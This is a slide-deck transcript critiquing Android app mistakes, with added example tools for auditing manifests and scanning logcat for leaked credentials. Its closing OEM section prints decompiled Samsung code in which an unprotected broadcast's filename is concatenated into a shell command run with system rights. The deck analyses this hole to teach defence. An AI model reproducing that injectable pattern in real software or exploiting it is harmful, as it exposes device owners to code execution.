PlayStore bashing: learn from the biggest fails on the Google Play Store
PLAY STORE BASHING: LEARN FROM THE BIGGEST FAILS
Eyal LEZMY
http://eyal.fr
SLIDES: http://bit.ly/andbigfails
01 IT ALL STARTS ON THE PLAY STORE
MINIMISE PERMISSIONS
Request only what your app requires.
1/3 of apps request more permissions than they need.
Users should prefer apps requesting the least permissions.
You don't need permission: use ContentProviders.
Permissions are not required to launch another activity that has the permission.
Need a contact?
Use the force, Luke
Start the contact app, then handle the result:

```java
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.provider.ContactsContract.CommonDataKinds.Phone;
import android.provider.ContactsContract.Contacts;

private static final int MY_REQUEST_CODE = 1;

// Start the contact app: the picker runs with its own READ_CONTACTS permission,
// and this app only receives a URI for the single entry the user chose.
Intent intent = new Intent(Intent.ACTION_GET_CONTENT);
intent.setType(Phone.CONTENT_ITEM_TYPE);
startActivityForResult(intent, MY_REQUEST_CODE);

// Handle the result
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
    super.onActivityResult(requestCode, resultCode, data);
    if (requestCode != MY_REQUEST_CODE || resultCode != RESULT_OK || data == null) {
        return; // cancelled, or not our request
    }
    Uri uri = data.getData();
    if (uri == null) {
        return;
    }
    Cursor c = getContentResolver().query(uri,
            new String[] {Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);
    if (c == null) {
        return;
    }
    try {
        if (c.moveToFirst()) {
            String name = c.getString(0);
            String number = c.getString(1);
            // use name and number
        }
    } finally {
        c.close(); // always release the cursor
    }
}
```
Need a UUID?

TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission

Settings.Secure.ANDROID_ID
Reset at every wipe
Not applicable in a multi-user environment

NO!

Generate your own UUID and use the Backup API!

```java
String id = UUID.randomUUID().toString();
```

YES!
Android Backup API
· The API is available on all Android devices.
· Manufacturers can implement their own transport and storage for the API.
· Each device has its own backup data.
· A new device will take a backup from a device associated with your Google account.
· IT'S NOT A SYNC API!
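The two halves of that slide put together, as an added example that is not code from the deck: the identifier is created once with UUID.randomUUID(), kept in a private SharedPreferences file, and carried to a replacement device by a BackupAgentHelper built on SharedPreferencesBackupHelper. The class, file and key names and the manifest wiring in the comment are assumptions, and the backup API key value is a placeholder.

```java
import android.app.backup.BackupAgentHelper;
import android.app.backup.BackupManager;
import android.app.backup.SharedPreferencesBackupHelper;
import android.content.Context;
import android.content.SharedPreferences;
import java.util.UUID;

/**
 * App-scoped identifier that needs no permission at all (example code, not from the deck).
 *
 * Wiring assumed in AndroidManifest.xml (names are hypothetical):
 *   <application android:allowBackup="true"
 *                android:backupAgent=".InstallId$BackupAgent" ...>
 *     <!-- key the Google transport needs on pre-Marshmallow devices -->
 *     <meta-data android:name="com.google.android.backup.api_key"
 *                android:value="BACKUP_API_KEY_PLACEHOLDER" />
 */
public final class InstallId {
    static final String PREFS_FILE = "install_id";      // assumption: private prefs file name
    static final String KEY_UUID = "uuid";               // assumption: preference key
    static final String HELPER_KEY = "install_id_prefs"; // assumption: helper key inside the backup set

    private InstallId() {}

    /** Returns the stable id, creating it on first call and requesting a backup pass. */
    public static synchronized String get(Context ctx) {
        SharedPreferences prefs = ctx.getApplicationContext()
                .getSharedPreferences(PREFS_FILE, Context.MODE_PRIVATE);
        String id = prefs.getString(KEY_UUID, null);
        if (id == null) {
            // Random v4 UUID: not derived from the IMEI, ANDROID_ID or any hardware identifier,
            // so it cannot be correlated across apps and needs no READ_PHONE_STATE.
            id = UUID.randomUUID().toString();
            // commit() is synchronous, so the file is on disk before any backup pass reads it.
            prefs.edit().putString(KEY_UUID, id).commit();
            // Flag our data as changed; the transport decides when the backup actually runs.
            new BackupManager(ctx).dataChanged();
        }
        return id;
    }

    /**
     * Backs up the whole preferences file through the platform Backup API.
     * Restore happens once, when the app is installed on a new device; it is not a sync.
     */
    public static class BackupAgent extends BackupAgentHelper {
        @Override
        public void onCreate() {
            addHelper(HELPER_KEY, new SharedPreferencesBackupHelper(this, PREFS_FILE));
        }
    }
}
```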
02 MICROSOFT STORY EPISODE 1
? ? ?
LOOK AND FEEL
HOTMAIL / OUTLOOK.COM: SAME!
FOLLOW THE GUIDELINES! http://d.android.com/design
Redesigned by Taylor Ling
By Microsoft
FOLLOW THE GUIDELINES! http://d.android.com/design
PLEASE!
03 MICROSOFT STORY EPISODE 2
XBOX MUSIC
Emulator (latest device configurations)
Nexus 7
S4
Nexus 10
Note 2
Galaxy Nexus
S3
Mega
Note 1
XCover (Android 2.3)
Tablets
Our Nutshell
Not compatible:
- Brand new devices: S4, Mega, HTC One, Xperia Z, ...
- Tablets: Nexus 7/10, Tab2, Tab3, Note 10.1, ...
- Old devices: XCover
Compatible:
- Mainstream devices: S3, Galaxy Nexus, Note 2, Note 1, ...
The dark side of the force, Luke
Let's look into the Manifest
```xml
<uses-sdk android:minSdkVersion="14"
          android:targetSdkVersion="14" />
```
Exclude the old devices.
Not recommended (Sept. 2013).
```xml
<compatible-screens>
    <screen android:screenSize="small" android:screenDensity="ldpi" />
    <screen android:screenSize="small" android:screenDensity="mdpi" />
    <screen android:screenSize="small" android:screenDensity="hdpi" />
    <screen android:screenSize="small" android:screenDensity="xhdpi" />
    <screen android:screenSize="normal" android:screenDensity="ldpi" />
    <screen android:screenSize="normal" android:screenDensity="mdpi" />
    <screen android:screenSize="normal" android:screenDensity="hdpi" />
    <screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>
```
Exclude tablets.
Exclude brand new devices (XXHDPI screens).
Too restrictive!
<compatible-screens>
"You should not use this element": it can dramatically reduce the potential user base for your application.
"Use it only as a last resort": when the application absolutely does not work with specific screen configurations.
"Instead, follow the guide to Supporting Multiple Screens."
<compatible-screens> does not accept xxhdpi, but you can instead specify 480 as the value.
Nothing seems tricky...
XXHDPI: 7.7% of Android devices
Tablets: 11.2% of Android devices
Missing targets: 18.9% of the market
The Mistakes
Have they tested on new devices?
Ignoring the power users: brand new devices are bought by power users and early adopters.
Does not support preloading music: the app is not perfectly optimized for mobility. Why ignore nomad devices like tablets?
Return of the APK
A day after: they updated the app.
```xml
<supports-screens
    android:smallScreens="true"
    android:normalScreens="true"
    android:largeScreens="false"
    android:xlargeScreens="false" />

<uses-sdk android:minSdkVersion="14"
          android:targetSdkVersion="18" />
```
HURRAY!!
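To see why the first manifest shut out exactly the groups in the Nutshell slides and why the update let them back in, here is an added example (not the deck's or Microsoft's code) that replays the store-side `<uses-sdk>` and `<compatible-screens>` checks against constructed device profiles; the `Device` and `ScreenRule` records, the dpi values and the API levels are assumptions approximating the devices named on the slides, and `<supports-screens>` is not modelled. The density match also shows the numeric `480` form being accepted where `xxhdpi` cannot be written (Java 17).

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.*;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.*;

/** Replays store-side <uses-sdk> and <compatible-screens> filtering (example code, not the deck's). */
public class StoreFilterSim {

    /** A device as the store sees it; density is the bucket value in dpi (xxhdpi = 480). Constructed. */
    record Device(String name, int apiLevel, String screenSize, int densityDpi) {}

    /** One <screen> row; density keeps the raw attribute text, a name like "xhdpi" or a number like "480". */
    record ScreenRule(String size, String density) {
        boolean accepts(Device d) {
            if (!size.equals(d.screenSize())) return false;
            int ruleDpi = switch (density) {
                case "ldpi" -> 120; case "mdpi" -> 160; case "hdpi" -> 240; case "xhdpi" -> 320;
                default -> Integer.parseInt(density); // "xxhdpi" is not a legal value here, "480" is
            };
            return ruleDpi == d.densityDpi();
        }
    }

    record Manifest(int minSdk, List<ScreenRule> screens) {
        /** Returns null when the device passes both filters, otherwise the reason it is excluded. */
        String reject(Device d) {
            if (d.apiLevel() < minSdk) return "API " + d.apiLevel() + " is below minSdkVersion " + minSdk;
            if (screens.isEmpty()) return null; // no <compatible-screens>: no screen filtering at all
            for (ScreenRule r : screens) if (r.accepts(d)) return null;
            return d.screenSize() + "/" + d.densityDpi() + "dpi is not listed in <compatible-screens>";
        }
    }

    /** Reads minSdkVersion and every <screen> row (non-namespace-aware parser, so "android:" is literal). */
    static Manifest parse(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        Element usesSdk = (Element) doc.getElementsByTagName("uses-sdk").item(0);
        int minSdk = Integer.parseInt(usesSdk.getAttribute("android:minSdkVersion"));
        List<ScreenRule> rules = new ArrayList<>();
        NodeList screens = doc.getElementsByTagName("screen");
        for (int i = 0; i < screens.getLength(); i++) {
            Element s = (Element) screens.item(i);
            rules.add(new ScreenRule(s.getAttribute("android:screenSize"),
                                     s.getAttribute("android:screenDensity")));
        }
        return new Manifest(minSdk, rules);
    }

    // Constructed sample: the first Xbox Music manifest fragments from the slides, wrapped in a root element.
    static final String XBOX_MUSIC_V1 = """
        <manifest xmlns:android="http://schemas.android.com/apk/res/android">
          <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="14" />
          <compatible-screens>
            <screen android:screenSize="small" android:screenDensity="ldpi" />
            <screen android:screenSize="small" android:screenDensity="mdpi" />
            <screen android:screenSize="small" android:screenDensity="hdpi" />
            <screen android:screenSize="small" android:screenDensity="xhdpi" />
            <screen android:screenSize="normal" android:screenDensity="ldpi" />
            <screen android:screenSize="normal" android:screenDensity="mdpi" />
            <screen android:screenSize="normal" android:screenDensity="hdpi" />
            <screen android:screenSize="normal" android:screenDensity="xhdpi" />
          </compatible-screens>
        </manifest>
        """;

    // Constructed sample: the updated manifest, <compatible-screens> gone (<supports-screens> is not modelled).
    static final String XBOX_MUSIC_V2 = """
        <manifest xmlns:android="http://schemas.android.com/apk/res/android">
          <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="18" />
        </manifest>
        """;

    // Constructed device profiles, approximated from the device names on the slides (API levels and dpi assumed).
    static final List<Device> DEVICES = List.of(
            new Device("Galaxy S4", 17, "normal", 480),
            new Device("HTC One", 17, "normal", 480),
            new Device("Nexus 7 (2013)", 18, "large", 320),
            new Device("Nexus 10", 17, "xlarge", 320),
            new Device("Galaxy XCover", 10, "normal", 160),
            new Device("Galaxy S3", 16, "normal", 320),
            new Device("Galaxy Nexus", 15, "normal", 320),
            new Device("Galaxy Note 2", 16, "normal", 320));

    public static void main(String[] args) throws Exception {
        for (String xml : List.of(XBOX_MUSIC_V1, XBOX_MUSIC_V2)) {
            Manifest m = parse(xml);
            System.out.println("minSdkVersion=" + m.minSdk() + ", <screen> rules=" + m.screens().size());
            for (Device d : DEVICES) {
                String why = m.reject(d);
                System.out.printf("  %-15s %s%n", d.name(), why == null ? "compatible" : "filtered: " + why);
            }
        }
    }
}
```

With the first manifest the xxhdpi phones, both tablets and the Android 2.3 XCover are reported as filtered and only the xhdpi phones pass; with the second only the XCover is still excluded, by minSdkVersion.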
04 MICROSOFT STORY EPISODE 3
MICROSOFT OFFICE
Follows the guidelines... this time.
Not that bad, but it could be better.
Fight the confusion
The Office 365 offer is quite confusing: people used to buy Office licenses, not subscribe to an Office service.
They try to avoid confusion.
The title is clear.
Is it explicit enough?
Problem
Does not support tablet format: a productivity app has to be compatible with big screen formats.
Microsoft's answer on the Play Store:
- The app is optimized for a phone
- On tablet, you can use the Office Webapps
- We plan to enable editing with Webapps
Other problems
Fewer features than the competitors: does not support local files, does not support editing.
The backend seems not very ready: I have been stuck for 24 hours at the mobile activation, and I'm not alone.
Conclusion
Adapt your UI to screen sizes depending on your features.
Differentiate your service from competitors, especially when you are new on the market.
Your backend has to support your mobile distribution.
One more thing!
Check out the Manifest

```xml
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-sdk android:minSdkVersion="14"
          android:targetSdkVersion="16" />
```
They support ICS+.
Read sensitive log data.
Ignore READ_LOGS: Jelly Bean removed this feature.
Accepts READ_LOGS: 38% of the supported devices.
Don't do this
Why scare 100% of your users? To use a feature with 38% of them.
Avoid using deprecated functions as much as possible.
05 YAHOO! WEATHER
Beautiful...
Very good score
Is it perfect? Hell no!
« Try not. Do. Or do not. There is no try. » YODA
A splashscreen
Non native UI
Where is my status bar?
Immersive experience (Games, Books, Videos): hide the status bar.
Multitasking (everything else): show the status bar.
When do you check the weather?
Morning?
- Choosing your clothes
- Eating your breakfast
- Checking your emails
- Looking after your kids
This is multitasking!
YouTube: an immersive app, no status bar.
It allows multitasking inside the app: playing video.
Samsung Video Player: Popup play.
About the context you have to think
06 FACEBOOK EPISODE 1
Under the hood
March 2013
Too many methods: LinearAlloc buffer overflow.
The solution is to divide the code into several dex files and load them on demand.
The Facebook app source code was not modular enough to allow this at application level: "Too many of our classes are accessed directly by the Android framework."
They had to do it at system level, thanks to reflection: "We needed to inject our secondary dex files directly into the system class loader."
![Page 104: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/104.jpg)
« More backwards compatibility for Facebook.
Another day, another private field accessed. »
Git commit message, Android source code
January 2013
![Page 106: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/106.jpg)
```java
/**
 * List of dex/resource (class path) elements.
 * Should be called pathElements, but the Facebook app uses reflection
 * to modify 'dexElements' (http://b/7726934).
 */
private final Element[] dexElements;
```
Android source code, DexPathList.java, commit of January 2013
![Page 107: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/107.jpg)
Patch set 2
"lets Facebook start (at least judging by logcat output)"
Android code review, January 2013
After manual testing
"Facebook starts, though I don't have an account."
![Page 108: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/108.jpg)
This was not enough
They finally patched the Dalvik VM itself, using a native hot fix to change the LinearAlloc buffer size at runtime
![Page 109: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/109.jpg)
I feel dirty
![Page 110: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/110.jpg)
In a nutshell
Modularity saves lives
Google seems to test some popular apps during platform integration, so that a system change does not break them
Google hires engineers when Facebook hires sculptors (inspired by Sayo Oladeji)
![Page 111: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/111.jpg)
FACEBOOK EPISODE 2
07
![Page 112: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/112.jpg)
![Page 113: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/113.jpg)
FACEBOOK HOME
A lock screen
![Page 114: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/114.jpg)
FACEBOOK HOME
Several services supported
![Page 115: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/115.jpg)
FACEBOOK HOME
And a launcher
![Page 116: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/116.jpg)
FACEBOOK HOME
![Page 117: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/117.jpg)
The problem
The launcher is too simple: no folders, no widgets, no dock (during the first months)
It used to be mandatory: lock screen + launcher
FACEBOOK HOME
![Page 118: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/118.jpg)
FACEBOOK HOME
![Page 119: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/119.jpg)
FACEBOOK HOME
![Page 120: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/120.jpg)
FACEBOOK HOME
Opens default launcher
![Page 121: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/121.jpg)
FACEBOOK HOME
Spot the odd one out
![Page 122: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/122.jpg)
Conclusion: keep the platform spirit. To override native OS elements you first have to implement all the basic features users are used to
Identify your weakest points and prepare how to limit their impact
FACEBOOK HOME
![Page 123: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/123.jpg)
CANAL PLUS
08
![Page 124: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/124.jpg)
![Page 125: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/125.jpg)
CANAL+ TOUCH
```
Request: https://canalURL.com/1.5/getThmChannel.php...
Request: https://canalURL.com/1.5/getProgramThm.php...
Request: https://canalURL.com/1.4/programRediff.php...
Request: https://canalURL.com/1.5/VOD.php?release=1...
json response : {"token":{"url":"http:\/\/download....
Request: https://canalURL.com/1.4/getChannel.php?SE...
json response: {"token":{"url":"https:\/\/canalURL....
Request: https://canalURL.com/1.5/guideTvChannel.ph...
Request: https://canalURL.com/1.5/programInfo.php?U...
Request: https://canalURL.com/1.5/myTv.php?release=...
```
This is the logcat
![Page 126: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/126.jpg)
Chatty logs make reverse engineering easier: HTTPS connection, PHP backend, all the URLs and parameters are known, some of the responses are known too
CANAL+ TOUCH
![Page 127: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/127.jpg)
Chatty logs can open really big security breaches
CANAL+ TOUCH
![Page 128: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/128.jpg)
```
https://canalURL.com/1.5/authentification.php?
login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...
```
CANAL+ TOUCH
This is still the logcat
Wait, WHAT?!
![Page 130: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/130.jpg)
Shut the fuck up!
Control your log output: easy method with BuildConfig.DEBUG
Never send a clear password over the network. NEVAAAAAAA!!!! Even under HTTPS, a password in a GET query string ends up in server access logs, proxies and, as here, in logcat, readable by any app that could read the log
CANAL+ TOUCH
![Page 131: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/131.jpg)
CANAL+ TOUCH
```java
// Compile-time switch: BuildConfig.DEBUG is false in release builds,
// so Log.d is never called on users' devices
public static final boolean SHOW_LOG = BuildConfig.DEBUG;

public static void d(final String tag, final String msg) {
    if (SHOW_LOG) Log.d(tag, msg);
}
```
Avoid the leak, easily
And test it during QA
Note that the caller still builds the message string; to strip the logging calls from release builds entirely, use ProGuard's -assumenosideeffects on the wrapper class
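The QA check suggested above, as an added example that is not part of the talk: a small scanner run over logcat output that flags any URL carrying a credential-looking query parameter and any cleartext http:// URL. The sample lines are constructed here after the slides (placeholder host canalURL.com, placeholder login and password); the parameter allowlist is an assumption you would extend for your own backend.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed logcat lines modelled on the Canal+ Touch output shown on the
# slides. Host, credentials and the download URL are placeholders, not captures.
SAMPLE_LOGCAT = """\
D/Canal   ( 1234): Request: https://canalURL.com/1.5/getThmChannel.php?release=1
D/Canal   ( 1234): Request: https://canalURL.com/1.5/VOD.php?release=1
D/Canal   ( 1234): json response : {"token":{"url":"http:\\/\\/download.example.invalid\\/v.mp4"}}
D/Canal   ( 1234): Request: https://canalURL.com/1.5/authentification.php?login=MY_LOGIN&pass=MY_CLEAR_PASSWORD
I/ActivityManager(  512): Start proc com.example.app for activity
"""

# Query-parameter names that should never appear in a log line (assumed list).
SECRET_PARAMS = {"pass", "password", "passwd", "pwd", "token", "secret",
                 "apikey", "api_key", "session", "sessionid"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def scan_logcat(text):
    """Returns (line_number, kind, url) for every suspicious URL in the log."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        # JSON-escaped URLs ("http:\/\/...") would otherwise slip past the regex
        line = raw.replace("\\/", "/")
        for url in URL_RE.findall(line):
            parts = urlsplit(url)
            if parts.scheme == "http":
                findings.append((lineno, "cleartext-http", url))
            leaked = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)
                      if k.lower() in SECRET_PARAMS]
            if leaked:
                findings.append((lineno, "secret-in-query:" + ",".join(leaked), url))
    return findings


if __name__ == "__main__":
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOGCAT
    for lineno, kind, url in scan_logcat(data):
        print("line %d: %s: %s" % (lineno, kind, url))
```

Run it on a real device with `adb logcat -d | python3 scan_logcat.py` against a release build: a clean release build should produce no findings at all, and any hit is a bug in the logging switch, not in the scanner.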
![Page 133: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/133.jpg)
OEM SOFTWARE
09
![Page 134: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/134.jpg)
The Android framework
Many APKs implement the features
They often have system access, to use low-level features
OEM SOFTWARE
![Page 135: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/135.jpg)
Open bar?
OEM SOFTWARE
![Page 136: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/136.jpg)
Let’s see
OEM SOFTWARE
![Page 137: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/137.jpg)
Android OEM applications (in)security
Talk by ANDRE MOULU, Quarkslab
OEM SOFTWARE
![Page 138: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/138.jpg)
Methodology: reverse engineering using Androguard
A custom result environment: manifest analysis, check for sensitive API usage, diff between OS versions (to find patches)
OEM SOFTWARE
![Page 139: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/139.jpg)
The results on Samsung devices
12 vulnerabilities found: leak of personal information, access to non-permitted features, silent SMS control, code injection...
Similar vulnerabilities on many manufacturers
OEM SOFTWARE
![Page 140: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/140.jpg)
Gimme more!
OEM SOFTWARE
![Page 141: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/141.jpg)
Search for sharedUserId = system (sensitive user ID)
Search for command execution (sensitive usage)
OEM SOFTWARE
Find serviceModeApp.apk = very sensitive app!
![Page 142: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/142.jpg)
OEM SOFTWARE
```xml
<receiver name=".FTATDumpReceiver">
    <intent-filter>
        <action name="com.android.sec.FTAT_DUMP"></action>
    </intent-filter>
</receiver>
<receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">
    <intent-filter>
        <action name="com.android.sec.FAILDUMP"></action>
    </intent-filter>
</receiver>
```
Receiver declared twice
A permission is required for the FAILDUMP action
No permission needed for the FTAT_DUMP action!!
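The manifest-analysis step of the methodology above, as an added example rather than Quarkslab's tooling: it applies the platform's export rule (an explicit android:exported wins, otherwise a component with an intent-filter is exported), flags exported components that declare no android:permission, flags a system sharedUserId, and reports a component declared more than once. The manifest is constructed after the slide excerpt; the package name and the full permission name (elided on the slide) are placeholders.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def A(attr):
    """Qualified name of an android: attribute as ElementTree sees it."""
    return "{%s}%s" % (ANDROID_NS, attr)


# Constructed manifest modelled on the serviceModeApp excerpt on the slides.
# Package name and permission prefix are placeholders (the slide elides them);
# the last receiver is added to show the non-exported case.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.servicemodeapp"
          android:sharedUserId="android.uid.system">
  <application>
    <receiver android:name=".FTATDumpReceiver">
      <intent-filter>
        <action android:name="com.android.sec.FTAT_DUMP" />
      </intent-filter>
    </receiver>
    <receiver android:name=".FTATDumpReceiver"
              android:permission="com.example.servicemodeapp.permission.KEYSTRING">
      <intent-filter>
        <action android:name="com.android.sec.FAILDUMP" />
      </intent-filter>
    </receiver>
    <service android:name=".FTATDumpService" />
    <receiver android:name=".SafeReceiver" android:exported="false">
      <intent-filter>
        <action android:name="com.example.INTERNAL" />
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

COMPONENTS = ("activity", "service", "receiver", "provider")


def is_exported(elem):
    """Platform rule: explicit android:exported wins; otherwise a component with an
    <intent-filter> is exported and one without is not. Providers were exported by
    default before API 17, so treat an unspecified provider as exported (conservative)."""
    explicit = elem.get(A("exported"))
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return True
    return elem.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Returns (component_name, issue) pairs for the findings described above."""
    root = ET.fromstring(xml_text)
    findings = []
    if root.get(A("sharedUserId")) == "android.uid.system":
        findings.append(("manifest", "runs as system uid"))
    seen = {}
    for app in root.iter("application"):
        for elem in app:  # direct children only: the declared components
            if elem.tag not in COMPONENTS:
                continue
            name = elem.get(A("name"))
            seen[(elem.tag, name)] = seen.get((elem.tag, name), 0) + 1
            if is_exported(elem) and elem.get(A("permission")) is None:
                actions = [a.get(A("name")) for a in elem.iter("action")]
                findings.append((name, "exported without permission: " + ",".join(actions)))
    for (tag, name), count in seen.items():
        if count > 1:
            findings.append((name, "%s declared %d times" % (tag, count)))
    return findings


if __name__ == "__main__":
    for name, issue in audit_manifest(SAMPLE_MANIFEST):
        print("%-20s %s" % (name, issue))
```

The manifest inside an APK is binary AXML, not text XML, so decode it first (apktool, or Androguard as in the talk) before feeding it to audit_manifest. An exported, unprotected component in an app that runs as the system uid is exactly the combination the search on the previous slide is looking for.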
![Page 145: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/145.jpg)
We read the FTATDumpReceiver source code
```java
public void onReceive(Context paramContext, Intent paramIntent) {
    String str1 = paramIntent.getAction();
    // Intercepts the FTAT_DUMP action
    if (str1.equals("com.android.sec.FTAT_DUMP")) {
        // Concatenates the FILENAME extra to str3
        String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
        [...]
        // Other concatenations follow
        String str9 = str8 + [...]
        // Prepares an intent to FTATDumpService
        Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);
        // Adds the final string to the intent
        localIntent2.putExtra("FILENAME", str9);
        // Starts FTATDumpService with our FILENAME parameter as extra
        paramContext.startService(localIntent2);
    }
    [...]
}
```
OEM SOFTWARE
![Page 152: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/152.jpg)
We then read the FTATDumpService source code
```java
public int onStartCommand(Intent paramIntent, ...) {
    // Extracts the FILENAME extra to str
    final String str = paramIntent.getStringExtra("FILENAME");
    [...]
    // Opens and starts a new thread
    new Thread(new Runnable() {
        public void run() {
            [...]
            // Seems to "do a shell command" with our FILENAME parameter concatenated in
            if (FTATDumpService.this.DoShellCmd("dumpstate > /data/log/" + str + ".log"))
                FTATDumpService.this.mHandler.sendEmptyMessage(1015);
            [...]
        }
    }).start();
    return 0;
}
```
OEM SOFTWARE
![Page 156: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/156.jpg)
